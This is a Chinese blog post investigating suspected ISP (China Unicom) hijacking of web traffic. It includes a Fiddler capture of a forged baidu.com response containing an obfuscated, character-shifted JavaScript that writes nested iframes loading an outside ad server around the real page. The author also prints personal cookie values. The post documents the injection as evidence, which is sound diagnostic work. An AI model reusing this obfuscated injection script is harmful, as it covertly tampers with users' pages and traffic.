• 联通DNS劫持


    这两天访问网页,总是时不时有广告,排除计算机中毒可能性后,怀疑是DNS被劫持了。。于是打开Fiddler。然后继续上网, 在一次打开http://www.baidu.com时,网页右下角弹出广告,于是马上打开Fiddler,查看HTTP通讯:

    GET http://www.baidu.com/ HTTP/1.1
    Host: www.baidu.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: zh-CN,zh;q=0.8
    Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
    Cookie: baidututuid=oldbaidututuiduser; baidstuurl=oldbaidututuiduser; NLC=0; Hm_lvt_9f14aaa038bbba8b12ec2a4a3e51d254=1315812373419; USERID=ee88756e2f08c323dc1f; BAIDU_WISE_UID=wiaui_1317086444_8009; MCITY=-%3A; vjuids=41ae5cbea.132d20f63e1.0.9ba426ad; vjlast=1317784217,1317784217,30; BAIDUID=6ABFB40CB81C81A172B13D4DC439448E:FG=1
    
    HTTP/1.1 200 OK
    Content-Type: text/html
    Cache-Control: no-cache
    Expires: epoch
    charset=gb2312: 
    Content-Length: 1057
    Connection: close
    
    <script>var d="=iunm?=ifbe?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?gvodujpo!mpbeBuusjcvuf)*|wbs!g>epdvnfou/hfuFmfnfouCzJe)#g#*<wbs!tfswfs>#iuuq;0072/293/283/7;33161#<wbs!sfrvjsfe>#beje>311169'uddb>d3q7ZXRxNUN3NUF2OFCi[IOt'vsjq>2117776366'psmv>bIS1dEpwM4e4ez6jZXmleT6kc31>'tqje>46394886:4'bsfb>3'ut>2429366336#<jg)tfmg/epdvnfou/mpdbujpo>>xjoepx/epdvnfou/VSM!''!epdvnfou/cpez/dmjfouXjeui?>611!''!epdvnfou/cpez/dmjfouIfjhiu?>611*|g/tsd>tfswfs,#0b0t@g>betuzmf`nto/iu";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="nm'#,sfrvjsfe,#'bpsmv>bIS1dEpwM4e4ez6tbY[mNENyNT6kc31wbX6kcIWl[Xi1cXxwcHm3[UB{NUGv[Ye{NkByNUFxNUBxNT6peH1>'q2bsn>299'q3bsn>363'q4bsn>31'q5bsn>6'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>2'ibtXijufVtfs>2#<~fmtf|g/tsd>tfswfs,#0b0q@#,sfrvjsfe,#'qvtiGmbh>1#<~~=0tdsjqu?=0ifbe?=cpez!pompbe>#mpbeBuusjcvuf)*#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op?=jgsbnf!je>#g#!gsbnfCpsefs>1!xjeui>211&!ifjhiu>211&!tdspmmjoh>bvup!tsd>##?=0jgsbnf?=0cpez?=0iunm?";document.write(i(d,c));</script>
    

      然后审查,看到的HTML DOM结构为:

    可以看到, 一共有3层iframe,先用是用加密脚本来生成页面A,然后加载广告管理页面B,在这页面B里,生成Iframe来加载"http://www.baidu.com?t=1318255266413"百度页面。

    现在可以从网络层知道过来的数据就是被改了的,联通网络DNS劫持算不算是证据确凿了。

  • 相关阅读:
    SSH入门常用命令
    Charles基础
    经典测试用例
    Fiddler基础教程
    增、删、改、查
    一位软件测试工程师浅谈用户体验
    用户体验测试点
    IIS测试环境搭建
    禅道Bug管理工具环境搭建
    LineageOS源码定制手机系统
  • 原文地址:https://www.cnblogs.com/evlon/p/2206644.html
Copyright © 2020-2023  润新知